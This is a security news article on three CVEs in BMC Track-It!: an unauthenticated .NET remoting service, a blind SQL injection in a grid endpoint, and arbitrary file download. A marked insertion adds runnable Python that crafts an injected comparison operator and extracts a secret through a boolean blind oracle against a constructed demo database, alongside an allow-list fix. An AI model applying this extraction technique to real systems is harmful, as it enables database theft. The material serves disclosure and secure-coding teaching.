
Multiple Vulnerabilities Found in BMC Track-It! Help Desk Software

Track-It!, the IT helpdesk solution developed by business service management software company BMC Software, is plagued by several vulnerabilities, the CERT Coordination Center at Carnegie Mellon University (CERT/CC) warned this week.

A total of three flaws were identified by Pedro Ribeiro of Agile Information Security in BMC Track-It! version 11.3.0.355.

The most serious of the three has been cataloged as a “missing authentication for critical function” weakness and assigned CVE-2014-4872. It can be exploited by a remote, unauthenticated attacker to upload and download files and to execute arbitrary code on the Track-It! server.

“BMC Track-It! exposes several dangerous remote .NET services on port 9010 without authentication. .NET remoting allows a user to invoke methods remotely and retrieve their result. The exposed service FileStorageService allows for arbitrary file upload and code execution. The exposed service ConfigurationService allows for retrieval of configuration files which contain both application and domain credentials,” CERT/CC wrote in its advisory.

The second vulnerability, CVE-2014-4873, is a blind SQL injection flaw: an authenticated user can inject SQL by supplying comparison operators in the POST body sent to the /TrackItWeb/Grid/GetData page, which the application inserts into its query.
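The following is an added illustration of the bug class just described, not code from Track-It! or from the CERT/CC advisory. It models a data-grid endpoint that lets the client choose the comparison operator for a filter: the filter value is bound as a parameter, but the operator (and column name) are pasted into the SQL text, so an attacker who controls the operator can append a boolean condition and use the presence or absence of rows as a blind oracle. The table, column names, sample tickets and the "password_hash" secret are all constructed for the demo; the hardened version shows the usual fix, an allow-list for identifiers and operators.

```python
"""Blind SQL injection through a user-supplied comparison operator.

Constructed illustration of the bug class described for CVE-2014-4873 (a grid
endpoint that accepts comparison operators in a POST body).  Not Track-It!
code: the tables, column names, sample rows and the admin "password_hash"
below are all made up for this example.
"""
import sqlite3

# Constructed sample data standing in for a help-desk database.
TICKETS = [(1, "Printer jam", 2), (2, "VPN down", 3), (3, "Password reset", 1)]
ADMIN_HASH = "5f4dcc3b"   # constructed secret that the blind oracle will recover

ALLOWED_FIELDS = {"id", "summary", "priority"}
ALLOWED_OPERATORS = {"=", "<>", "<", "<=", ">", ">="}


def make_db():
    """In-memory SQLite database populated with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, summary TEXT, priority INTEGER)")
    con.executemany("INSERT INTO tickets VALUES (?, ?, ?)", TICKETS)
    con.execute("CREATE TABLE users (name TEXT, password_hash TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', ?)", (ADMIN_HASH,))
    con.commit()
    return con


def grid_get_data_vulnerable(con, field, operator, value):
    """Vulnerable pattern: the value is bound, but the column name and the
    comparison operator are concatenated straight into the SQL text."""
    sql = f"SELECT id, summary FROM tickets WHERE {field} {operator} ? ORDER BY id"
    return con.execute(sql, (value,)).fetchall()


def grid_get_data_hardened(con, field, operator, value):
    """Fix: only identifiers and operators from a fixed allow-list reach the
    query text; anything else is rejected before any SQL is built."""
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"unknown field: {field!r}")
    if operator not in ALLOWED_OPERATORS:
        raise ValueError(f"unknown operator: {operator!r}")
    sql = f"SELECT id, summary FROM tickets WHERE {field} {operator} ? ORDER BY id"
    return con.execute(sql, (value,)).fetchall()


def injected_operator(position, guess):
    """Operator string an attacker submits instead of "=".  It leaves exactly
    one '?' so the bound parameter still lines up, and makes the result set
    depend on one character of a secret held in another table."""
    return (f"= 2 AND (SELECT substr(password_hash, {position}, 1) FROM users "
            f"WHERE name = 'admin') = '{guess}' AND 2 =")


def blind_extract(con, length=len(ADMIN_HASH), alphabet="0123456789abcdef"):
    """Boolean-based blind extraction against the vulnerable endpoint: each
    request either returns the priority-2 ticket (guess correct) or nothing
    (guess wrong).  Length is known here only because this is a demo."""
    recovered = ""
    for position in range(1, length + 1):          # SQLite substr() is 1-based
        for guess in alphabet:
            rows = grid_get_data_vulnerable(
                con, "priority", injected_operator(position, guess), 2)
            if rows:
                recovered += guess
                break
        else:
            raise RuntimeError(f"no candidate matched at position {position}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legit filter   :", grid_get_data_vulnerable(db, "priority", "=", 2))
    print("leaked secret  :", blind_extract(db))
    try:
        grid_get_data_hardened(db, "priority", injected_operator(1, "5"), 2)
    except ValueError as err:
        print("hardened reject:", err)
```

The point of the hardened version is that operators and column names are not data and cannot be made safe by escaping; they must be matched against a fixed list, with the request rejected otherwise. Binding only the value, as the vulnerable function does, gives no protection when the rest of the predicate is attacker-controlled.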

The third issue, CVE-2014-4874, is classed as a permissions, privileges and access control weakness: it allows a remote authenticated attacker to download arbitrary files through the /TrackItWeb/Attachment page.

CERT/CC said it was not aware of a practical solution to the problem. Using a firewall to block inbound requests to TCP port 9010 cuts off access to the exposed .NET remoting methods, but, the organization cautioned, it could also interfere with the normal operation of the software. Administrators who take this route should restrict the port to trusted hosts rather than blocking it outright, and verify that the help desk still functions afterwards.

“BMC takes application security seriously. We have a dedicated product application security team which monitors incoming alerts sent to our [email protected] alias, as well as all AppSec related issues reported by customers through our support team, via Twitter or directly from Application Security researchers. We work hard to respond to these alerts and repair all CVSS critical or high vulnerabilities found in any of our products,” BMC Software representatives told SecurityWeek.

In this particular case, the company says it is aware of the vulnerabilities and that its AppSec team has been working on addressing them. BMC Software also said it has contacted Pedro Ribeiro regarding his findings and is in contact with all appropriate organizations and users of the product.

“We will issue support alerts to affected customers and relevant organizations,” the company said.

In late September, BMC Software informed customers that it had been investigating and assessing the impact of the GNU Bash vulnerability dubbed “ShellShock” on the company’s products and services.

The list of affected products and services includes ADDM, BMC Remedy OnDemand, CLM Rapid Deployment Stack, BMC Middleware and Transaction Management, BMC Application Management Console, BMC Real End User Experience Hardware collector (1200 series), BMC Real End User Experience Monitoring, BMC TrueSight End User Collector (4200 Series), and BMC TrueSight End User Monitor (all series).

A fix has already been made available for ADDM, and perimeter systems have been updated to minimize exposure from the Web in the case of BMC Remedy OnDemand. For the other products, patches are expected to become available later this month, the company said.
Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
